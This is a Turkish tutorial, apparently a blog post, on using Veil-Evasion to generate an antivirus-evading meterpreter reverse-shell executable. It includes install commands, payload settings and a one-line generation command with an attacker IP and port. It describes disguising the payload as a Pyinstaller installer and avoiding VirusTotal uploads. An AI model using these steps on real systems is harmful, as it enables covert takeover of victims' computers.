Msfvenom ile antivirüs atlatma makalemizden sonra şimdi de veil-evasion kullanarak antivirüs nasıl atlatılacağına değineceğiz.
Veil-Evasion Nedir?
Sızma testlerinde karşılaşılan antivirüs yazılımlarını aşarak shell açmak gerekmektedir. Veil antivirüs atlatmak için kodlara farklı encoding uygulayan veya başka bir uygulamaya zararlı kodu enjekte eden, linux üzerinde çalışan açık kaynak kodlu bir frameworktur. x86 ve x64 versiyonlarla uyumludur. Her bir payload random üretilmeye çalışılır.
Shell açmak için veil-evasion araçını kullanarak çalıştırılabilir exe dosyasını encode edeceğiz. Encode edilmiş uygulama antivirüs tarafından tespit edilemeyecektir.
Veil-Evasion Nasıl Kurulur?
Kali ile çalıştığımızdan şu aşağıdaki komut ile kurulum yapabiliriz.
Kali dışında bir linux kullanacaksanız aşağıdaki komutu kullanabilirsiniz:
wget https://github.com/ChrisTruncer/Veil/archive/master.zip
unzip master.zip
cd Veil-master/setup
cd ..
./setup.sh
Gelen soruya “y” diyerek kuruluma devam ediyoruz.
Sonraki adımlarda "Next" diyerek devam ediyoruz.
Veil-Evasion Kullanımı
Veil kurulduktan sonra aşağıdaki komutu çalıştırıyoruz.
root@kali: veil-evasion
Aşağıdaki gibi karşılama ekranı gelmektedir.
“list” komutu ile tüm payload’ları görüntüleyebilirsiniz.
[>] Please enter a command: use 35
Örnek olarak 35. payload kullanıldı.
[>] Please enter a command: set USE_PYHERION Y
Büyük harfle yazmaya dikkat edin.
USE_PYHERION: Varsayılan olarak N'dir ve uygulanmayacaktır. Üretilecek zararlı yazılımın ek olarak Python'un pyherion şifrelemesinden geçirileceğini belirtir.
Gelen ekranda “generate“ dedikten sonra dosya üretilir.
Gelen ekran 1 seçilir.
Aşağıdaki ekrandalarda her satırda saldırgan bilgileri girilmelidir.
Metasploit payload için “windows/meterpreter/reverse_tcp”
LHOST : Saldırı IP adresi
LPORT : Saldırı port
Oluşturulacak exe için Pyinstaller.exe dosyası kullanılır. Bunun için “1” seçilir ve üretilen dosya Pyinstaller dosyası çalıştırıldığında zararlı yazılım çalışacaktır. Kurban Pyinstaller dosyasını kurduğunu düşünecektir fakat aynı zamanda virüs uygulamasınıda çalıştıracaktır.
Dosyanın oluşturulduğu dizin ve diğer bilgiler gösterilir.
En alt satırda bize online scannerlara taratmamamızı önermektedir. Bu öneriye uyulmasa, oluşturulan dosya virustotal’e yüklediğimizde başarı oranı artacaktır. Bu oran bizim gibi arkadaşların buraya yüklemesi sonucu, antivirüs firmalarının dosyaları tanıyan uygulamalar geliştimesine bağlıdır. Buraya aynı dosya yüklendikçe firmalar uygulamaları kontrol etmesi sonucu çözümünü bulabilmektedir. Bu da bize gösteriyor ki bu oran artacaktır.
Reverse Shell Açma
Artık hedef sistemde uygulama çalıştıktan sonra sistemi ele geçilirlecektir.
Metasploit açılarak reverse_tcp dinleme modunda beklenir.
Sisteme bağlanıldı ve kurbanı ele geçirdik.
Veil Evasion ile adım adım yaptığımız zararlı kod üretmeyi, tek bir komut satırında da çalıştırabilirsiniz. Bunun için terminale aşağıdaki komutları yazmalısınız.
root@kali: veil-evasion -p 35 -c LHOST=192.168.2.13 LPORT=4444 use_pyherion=Y --overwrite -o malicious
Sonraki adımları geçerek, oluşan dosya bilgileri aşağıdaki gibidir.
Oluşan çalıştırılabilir dosya şu dizinde bulunacaktır “/root/Veil-master/output/compiled/”
Antivirüs yazılımlarını bu yöntemle atlatılabilmektedir.